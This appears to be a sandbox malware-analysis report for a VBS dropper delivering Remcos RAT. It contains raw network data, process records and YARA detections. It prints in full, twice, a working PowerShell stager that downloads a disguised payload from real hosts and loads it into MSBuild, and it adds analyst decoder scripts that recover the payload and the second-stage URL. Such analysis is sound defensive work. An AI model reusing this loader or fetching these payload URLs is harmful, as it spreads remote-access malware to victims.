54 4d 6a 44 79 38 76 4d 38 4a 44
                                                                                              Data Ascii: 0YMNBTTt0ALNkSzn0MJN7QjDz0/M2PD0zQ8M6Ojrzg6MaNTNy8vMbLzvyMUMaHjIAAAAYCQAAAwPO+Da/AkPr7j5+EJP7yDo8sJPVyTh80FPIwzA7oTO5hzs4M5Ndfj01UeNoSje0UWMoHjvAAAA8AAAwDAAAkjr5AZOnhzy40KOeeDI3MgN2bz52MsN9azj2QnNWZDT2UQNpXz31UXNmVTY1wVNbUjF0MLNYMz1zA8MBOzcz02MTMjDy8vM8JD
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 41 41 41 41 41 41 41 41 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 2f 42 36 58 4d 41 41 51 2b 67 37 4e 32 54 48 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 6a 32 71 70 39 58 41 41 69 32 65 70 64 55 41 41 51 42 52 42 41 41 41 41 67 2f 68 36 48
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAgACIgACIgACIgACIgACIgACIgACIgACIgACAAAAAAAAEQABEQABEQABEQABEQABEQABEQABEQABEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg/B6XMAAQ+g7N2THIAAAAAAAAAAAAAAAAAAAAAAIj2qp9XAAi2epdUAAQBRBAAAAg/h6H
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 30 55 41 41 41 41 45 41 41 47 4a 4e 42 41 41 41 41 43 6b 78 6b 46 49 43 41 41 78 48 6f 2f 2f 66 2f 49 42 77 52 4d 77 45 41 41 41 41 41 41 59 55 30 51 44 41 41 41 45 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 7a 4c 41 41 41 51 41 41 59 55 30 73 43 41 41 41 49 51 47 54 57 67 49 41 41 45 51 78 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 6a 48 41 41 41 51 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 46 4e
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAYk0UAAAAEAAGJNBAAAACkxkFICAAxHo//f/IBwRMwEAAAAAAYU0QDAAAEAAAAQAAAAAAAAAAAAAAAAA/////DAAAAw/////AAAAAAAAAAAAAAAAAAAAAAgRRzLAAAQAAYU0sCAAAIQGTWgIAAEQxCAAAAAAAAAAAAAAAAgRRjHAAAQAAAAABAAAAAAAAAAAAAAAA8////PAAAAA/////DAAAAAAAAAAAAAAAAAAAAAAGFN
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 31 41 54 4f 47 52 55 52 43 4a 44 4e 32 67 6a 51 7a 4d 7a 51 44 4e 6b 4e 78 67 44 4f 42 4e 45 52 44 4e 6a 4e 35 45 6b 52 47 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 42 44 52 35 41 54 4f 34 67 6a 4e 79 49 54 4e 78 51 6b 51 47 46 7a 4e 77 6b 44 52 31 59 55 4f 42 6c 54 52 31 55 55 4f 47 5a 6b 52 47 5a 30 4e 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 30 4e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: 1ATOGRURCJDN2gjQzMzQDNkNxgDOBNERDNjN5EkRGBDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBDR5ATO4gjNyITNxQkQGFzNwkDR1YUOBlTR1UUOGZkRGZ0NGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZ0NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 74 65 42 38 49 2b 6b 74 2b 47 65 63 64 66 53 75 2b 73 57 6d 59 6c 48 65 30 37 59 69 71 56 6e 77 49 54 6b 6a 4a 6e 57 4b 4a 42 65 49 54 6a 46 64 44 32 43 31 2b 6d 6c 32 56 4b 6c 65 72 2f 62 62 63 57 5a 46 53 2b 31 35 44 38 59 2b 47 76 32 30 58 4f 61 6a 47 42 76 45 42 79 55 64 43 4d 38 4c 41 48 65 58 2b 37 41 6d 46 70 2b 47 6e 56 69 75 61 6c 6b 33 78 4f 36 6a 31 4b 47 52 41 61 53 4e 4c 66 64 78 71 63 4e 2f 50 56 4f 54 6c 55 76 41 32 46 4a 69 4d 33 6d 39 74 61 6e 2b 56 42 43 4d 44 4d 35 53 6a 6a 31 71 73 71 66 52 78 2f 52 6e 72 74 38 4f 72 36 6c 6c 36 63 43 70 44 72 78 46 6c 4e 6c 66 42 64 4b 55 52 52 76 51 51 6a 37 56 30 68 45 62 63 42 58 31 79 59 62 59 37 74 4d 68 51 53 6d 56 42 7a 4a 32 30 53 75 33 49 77 77 73 78 6c 44 71 42 45 30 2f 4e 55 35 69 6f 77 54
                                                                                              Data Ascii: teB8I+kt+GecdfSu+sWmYlHe07YiqVnwITkjJnWKJBeITjFdD2C1+ml2VKler/bbcWZFS+15D8Y+Gv20XOajGBvEByUdCM8LAHeX+7AmFp+GnViualk3xO6j1KGRAaSNLfdxqcN/PVOTlUvA2FJiM3m9tan+VBCMDM5Sjj1qsqfRx/Rnrt8Or6ll6cCpDrxFlNlfBdKURRvQQj7V0hEbcBX1yYbY7tMhQSmVBzJ20Su3IwwsxlDqBE0/NU5iowT
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 38 49 49 51 71 6c 72 37 72 6d 77 50 78 72 46 6d 49 58 71 6a 52 78 37 6b 76 38 72 6d 78 62 6a 6e 2f 45 76 51 61 36 61 71 74 41 4f 76 52 56 4c 46 7a 79 57 70 48 2f 54 38 71 30 4c 77 73 46 44 7a 38 61 5a 78 51 6b 44 52 62 6d 7a 50 78 50 52 41 51 4c 78 57 52 78 37 61 62 32 4f 78 4f 31 37 65 2f 41 2f 2b 6d 39 71 2f 54 76 42 50 41 70 7a 46 6e 55 38 65 53 39 44 38 6a 7a 75 4d 54 48 74 6f 38 41 70 48 63 62 68 34 50 46 33 50 77 7a 73 6b 72 49 33 52 33 7a 44 6d 6d 36 69 53 63 48 6d 43 2f 41 66 74 59 78 57 2b 4a 2b 41 50 52 69 45 65 59 45 54 59 31 38 44 38 65 36 6a 79 47 50 2f 67 38 45 6d 68 2b 75 6b 73 45 2b 2f 50 77 66 59 52 59 55 33 6d 49 7a 4c 6a 52 2b 74 34 78 79 6a 4a 2f 41 50 63 72 6c 53 33 32 37 4e 50 4e 4f 6e 34 6b 57 48 74 6c 39 44 38 5a 42 37 30 56 55 49
                                                                                              Data Ascii: 8IIQqlr7rmwPxrFmIXqjRx7kv8rmxbjn/EvQa6aqtAOvRVLFzyWpH/T8q0LwsFDz8aZxQkDRbmzPxPRAQLxWRx7ab2OxO17e/A/+m9q/TvBPApzFnU8eS9D8jzuMTHto8ApHcbh4PF3PwzskrI3R3zDmm6iScHmC/AftYxW+J+APRiEeYETY18D8e6jyGP/g8Emh+uksE+/PwfYRYU3mIzLjR+t4xyjJ/APcrlS327NPNOn4kWHtl9D8ZB70VUI
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 2f 63 2b 5a 41 44 41 41 41 41 77 50 6e 72 49 51 41 41 41 41 41 38 7a 35 74 43 45 41 41 41 41 41 2f 63 4f 30 41 42 41 41 41 41 77 50 6e 54 50 41 41 41 41 41 41 38 44 36 59 41 41 41 41 41 41 41 2f 67 4f 50 41 43 41 41 41 41 77 50 6f 48 47 67 41 41 41 41 41 38 44 36 48 43 41 41 41 41 41 41 2f 67 4f 72 41 44 41 41 41 41 77 50 6f 50 4e 41 41 41 41 41 41 38 44 36 35 44 4d 41 41 41 41 41 2f 6b 65 49 41 41 41 41 41 41 77 50 70 6a 45 77 41 41 41 41 41 38 54 36 78 42 41 41 41 41 41 41 2f 6b 65 6d 41 43 41 41 41 41 77 50 70 4c 4d 77 41 41 41 41 41 38 54 36 73 44 49 41 41 41 41 41 2f 6f 75 46 41 44 41 41 41 41 77 50 71 48 45 77 41 41 41 41 41 38 6a 36 74 42 41 41 41 41 41 41 2f 6f 65 6d 41 41 41 41 41 41 77 50 71 58 4d 67 41 41 41 41 41 38 6a 36 79 44 49 41 41 41 41
                                                                                              Data Ascii: /c+ZADAAAAwPnrIQAAAAA8z5tCEAAAAA/cO0ABAAAAwPnTPAAAAAA8D6YAAAAAAA/gOPACAAAAwPoHGgAAAAA8D6HCAAAAAA/gOrADAAAAwPoPNAAAAAA8D65DMAAAAA/keIAAAAAAwPpjEwAAAAA8T6xBAAAAAA/kemACAAAAwPpLMwAAAAA8T6sDIAAAAA/ouFADAAAAwPqHEwAAAAA8j6tBAAAAAA/oemAAAAAAwPqXMgAAAAA8j6yDIAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 67 45 41 44 42 51 52 59 44 4e 41 41 41 51 53 41 67 45 41 61 42 51 52 59 6a 4d 41 41 41 41 53 41 67 45 41 61 42 51 52 59 44 4d 41 41 41 77 51 41 34 45 41 46 42 51 52 59 7a 4b 41 41 41 67 51 41 77 45 41 4f 42 51 52 59 7a 4a 41 41 41 51 51 41 34 45 41 46 42 51 52 59 54 49 41 41 41 51 56 41 34 45 41 46 42 51 52 59 44 47 41 41 41 51 56 41 34 45 41 46 42 51 52 59 7a 44 41 41 41 51 56 41 34 45 41 46 42 51 52 59 6a 43 41 41 41 41 41 41 41 41 41 7a 42 51 5a 41 51 48 41 68 42 41 64 41 4d 48 41 74 41 41 5a 41 55 47 41 30 42 51 61 41 34 47 41 31 42 41 41 41 41 41 41 74 42 77 62 41 51 47 41 6e 42 67 62 41 6b 47 41 72 42 51 4c 41 51 47 41 6c 42 41 64 41 6b 47 41 75 42 51 64 41 41 41 41 76 42 77 5a 41 45 47 41 69 42 77 62 41 51 48 41 67 41 67 4a 41 41 43 41 6b 42 51
                                                                                              Data Ascii: AgEADBQRYDNAAAQSAgEAaBQRYjMAAAASAgEAaBQRYDMAAAwQA4EAFBQRYzKAAAgQAwEAOBQRYzJAAAQQA4EAFBQRYTIAAAQVA4EAFBQRYDGAAAQVA4EAFBQRYzDAAAQVA4EAFBQRYjCAAAAAAAAAzBQZAQHAhBAdAMHAtAAZAUGA0BQaA4GA1BAAAAAAtBwbAQGAnBgbAkGArBQLAQGAlBAdAkGAuBQdAAAAvBwZAEGAiBwbAQHAgAgJAACAkBQ


                                                                                              Target ID:0
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
                                                                                              Imagebase:0x7ff7c11a0000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true
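The PowerShell command line above is the whole first-stage loader: fetch a "JPEG" from Cloudinary, cut the text between the <<BASE64_START>> and <<BASE64_END>> markers, reverse it, base64-decode it, Assembly.Load() the result and call dnlib.IO.Home.VAI() with the second-stage URL written backwards ('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', which is the set.officialswrc.top/ink/gre.txt request seen in the network section). The following is an added analyst script that reproduces those decode steps offline; it is not code from the sample, from dnlib or from this Joe Sandbox report. The carrier and payload bytes in it are constructed stand-ins, and the function names are the author's own. One caveat it encodes: the stager's line `$unloose -ge 0 -and $Benedict -gt $unloose;` only emits a boolean and gates nothing, so a carrier without markers makes Substring throw; the example enforces the check instead.

```python
"""
Offline re-implementation of the decode steps in the PowerShell command line
of Target ID 1: UTF-8 decode the downloaded "image", take the text between
<<BASE64_START>> and <<BASE64_END>>, reverse it, base64-decode it, and turn
the backwards string arguments handed to the loaded assembly the right way round.

Added analyst example; not code from the sample, from dnlib, or from the Joe
Sandbox report. CARRIER is a CONSTRUCTED stand-in for the Cloudinary file
(fake JPEG header + marker-wrapped payload); FAKE_PAYLOAD is not a real PE.
"""
import base64
import binascii

START = "<<BASE64_START>>"
END = "<<BASE64_END>>"

# Constructed test data (not the real carrier or payload).
FAKE_PAYLOAD = b"MZ" + b"\x90" * 8 + b"constructed stand-in, not a real .NET assembly"
CARRIER = (
    b"\xff\xd8\xff\xe0 fake-jpeg-header "
    + START.encode()
    + base64.b64encode(FAKE_PAYLOAD)[::-1]   # stored reversed, as the stager expects
    + END.encode()
    + b" trailer bytes"
)


def extract_payload(carrier: bytes) -> bytes:
    """Mirror the stager's slicing, but actually enforce the marker check.

    The captured command line evaluates `$unloose -ge 0 -and $Benedict -gt $unloose`
    and discards the result, so a missing marker there ends in a Substring exception.
    """
    text = carrier.decode("utf-8", errors="replace")  # [Text.Encoding]::UTF8.GetString
    start = text.find(START)
    end = text.find(END)
    if start < 0 or end <= start:
        raise ValueError("payload markers missing or out of order")
    start += len(START)
    blob = text[start:end]
    # -join (ToCharArray() | ForEach-Object { $_ })[-1..-N]  ==  reverse the string
    return base64.b64decode(blob[::-1], validate=True)


def decode_or_none(carrier: bytes):
    """Triage-loop wrapper: None instead of an exception for non-carriers."""
    try:
        return extract_payload(carrier)
    except (ValueError, binascii.Error):
        return None


def unreverse_args(args):
    """The C2 URL is passed to VAI() written backwards; turn such arguments around."""
    return [a[::-1] for a in args]


def looks_like_pe(data: bytes) -> bool:
    return data[:2] == b"MZ"


if __name__ == "__main__":
    pe = extract_payload(CARRIER)
    print(len(pe), "bytes, MZ header:", looks_like_pe(pe))
    print(unreverse_args(["txt.erg/kni/pot.crwslaiciffo.tes//:sptth"]))
```

Run it against the real carrier by replacing CARRIER with the downloaded file's bytes; a result that starts with MZ is the .NET loader the stager hands to Assembly.Load(), and the first un-reversed VAI() argument is the URL to pull for the next stage.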

                                                                                              Target ID:2
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:07:19:29
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
                                                                                              Imagebase:0x7ff67c8e0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:07:19:29
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:wscript.exe C:\ProgramData\talpe.vbs
                                                                                              Imagebase:0x7ff7c11a0000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true
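The stager in the Target ID 9 command line fetches a file hosted as an "image", carves the text between two literal markers, reverses it character by character, base64-decodes the result, loads it as a .NET assembly and calls a static method with a reversed URL and the name of the process to host the payload. The boolean `$unloose -ge 0 -and $Benedict -gt $unloose` is evaluated and discarded, so it is not a guard. The following is an added example, not Joe Sandbox output and not the malware's own code: it re-implements the carving step in Python so the staged blob can be recovered offline from a saved copy of the hosted file, and it pulls the indicators out of the command line. REPORT_CMDLINE is copied from the report; the carrier text used to exercise the carving function is constructed here.

```python
"""Offline decoder for the PowerShell stager recorded for Target ID 9.

Added example, not Joe Sandbox code and not the malware's code.
REPORT_CMDLINE is the command line from the report; build_carrier()
produces a constructed stand-in for the hosted "image".
"""
import base64
import re

REPORT_CMDLINE = (
    "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/"
    "v1734315244/m3gtbqktvnocyvm410aa.jpg';"
    "$fishers = New-Object System.Net.WebClient;"
    "$marmalady = $fishers.DownloadData($noninterest);"
    "$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);"
    "$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';"
    "$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);"
    "$unloose -ge 0 -and $Benedict -gt $unloose;"
    "$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;"
    "$biographed = $ruddle.Substring($unloose, $tumefied);"
    "$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })"
    "[-1..-($biographed.Length)];"
    "$nonflavored = [System.Convert]::FromBase64String($backing);"
    "$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);"
    "$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');"
    "$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', "
    "'$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', "
    "'C:\\ProgramData\\','talpe','vbs','1','1','TaskName'));"
)


def parse_indicators(cmdline: str) -> dict:
    """Extract staging URL, carve markers, loader entry point and Invoke args."""
    staging = re.search(r"'(https?://[^']+)'", cmdline)
    markers = re.findall(r"'(<<[A-Z0-9_]+>>)'", cmdline)
    loader = re.search(r"\[([\w.]+)\]\.GetMethod\('(\w+)'\)", cmdline)
    call = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", cmdline, re.S)
    args = re.findall(r"'([^']*)'", call.group(1)) if call else []
    # The loader receives reversed strings; un-reverse any that become a URL.
    second_stage = [a[::-1] for a in args
                    if a[::-1].startswith(("http://", "https://"))]
    return {
        "staging_url": staging.group(1) if staging else None,
        "markers": markers,
        "loader": loader.groups() if loader else None,
        "invoke_args": args,
        "second_stage_urls": second_stage,
    }


def carve_payload(carrier_text: str, start: str = "<<BASE64_START>>",
                  end: str = "<<BASE64_END>>") -> bytes:
    """Mirror the stager's carving: substring between the markers, reversed,
    then base64-decoded.  Unlike the stager, a missing marker raises here."""
    s = carrier_text.find(start)
    e = carrier_text.find(end)
    if s < 0 or e <= s:
        raise ValueError("carve markers not found or out of order")
    carved = carrier_text[s + len(start):e]
    # .NET FromBase64String ignores whitespace; do the same before reversing.
    carved = re.sub(r"\s+", "", carved)
    return base64.b64decode(carved[::-1])


def build_carrier(payload: bytes) -> str:
    """Constructed stand-in for the hosted image: junk around the reversed
    base64 of the payload, the layout the stager expects (not real data)."""
    reversed_b64 = base64.b64encode(payload).decode("ascii")[::-1]
    junk_head = bytes([0xFF, 0xD8, 0xFF, 0xE0]).decode("latin-1") + " constructed "
    return junk_head + "<<BASE64_START>>" + reversed_b64 + "<<BASE64_END>>" + " tail"


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on the carved blob before handing it to a .NET tool."""
    return blob[:2] == b"MZ"


if __name__ == "__main__":
    for key, value in parse_indicators(REPORT_CMDLINE).items():
        print(f"{key}: {value}")
    sample = b"MZ" + bytes(range(256))  # constructed, not a real assembly
    recovered = carve_payload(build_carrier(sample))
    print("round-trip ok:", recovered == sample, "PE-like:", looks_like_pe(recovered))
```

To use it on a real capture, read the saved carrier with `open(path, "rb").read().decode("utf-8", "replace")` (the stager itself decodes the bytes as UTF-8) and pass that text to `carve_payload`; the markers survive the lossy decode because they are ASCII.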

                                                                                              Target ID:10
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:11
                                                                                              Start time:07:19:33
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0x90000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:07:19:33
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0xb30000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
